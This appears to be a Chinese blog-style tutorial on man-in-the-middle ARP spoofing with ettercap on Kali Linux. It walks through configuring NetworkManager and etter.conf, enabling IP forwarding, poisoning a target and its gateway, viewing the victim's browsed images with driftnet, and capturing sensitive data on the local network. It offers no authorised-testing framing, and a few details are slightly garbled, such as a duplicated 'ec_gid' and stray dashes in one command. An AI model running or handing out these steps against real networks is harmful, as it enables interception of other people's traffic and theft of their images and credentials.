1.首先需要對kali中的ettercap進行配置;
配置文件為:/etc/ettercap/etter.conf
(1)首先需要將NetworkManager的配置文件進行修改;
vi /etc/NetworkManager/NetworkManager.conf
將其中的false修改為true,如下:
[ifupdown]
managed=true
(2)重啟服務
service network-manager restart
2.配置ettercap的配置文件
vim /etc/ettercap/etter.conf
(1)修改ec_gid和ec_gid的值為0
(2)找到linux分類下的if you use iptables這一行,打開轉發。
3.查看系統啟動時ip_forward參數,並修改為1
cat /proc/sys/net/ipv4/ip_forward
echo 1 >>/proc/sys/net/ipv4/ip_forward
至此,IP轉發功能已開啟完畢。
4.使用ettercap進行arp欺騙
(1)ettercap –i –eth0 –Tq –M arp:remote/ip(host)//net gatemask/
如:ettercap –i eth0 –Tq –M arp:remote/192.168.3.26//192.168.3.1/
-i 后面跟的是連接局域網的網卡;
-M 后面跟的是指定使用arp的方式;
-Tq T指的是text文本模式,q指的是安靜模式執行這個命令;(quiet)
remote后面的IP地址:
第一個IP地址是:指定要嗅探的局域網的IP地址
第二個IP地址是:網關地址
如果需要嗅探該局域網的所有地址,那么第一個IP地址為空即可。
鍵入”h”,查看幫助信息:
l
輸出主機列表;
5.如何驗證arp欺騙是否成功——使用driftnet(網絡圖片嗅探工具)來測試。
driftnet -i eth0 ……會打開一個窗口顯示主機瀏覽的圖片 -i參數為指定監聽的網卡
plus:
如果提示失敗,未找到命令,安裝一下即可。
apt-get install driftnet
6.ettercap也可以抓取局域網內的敏感信息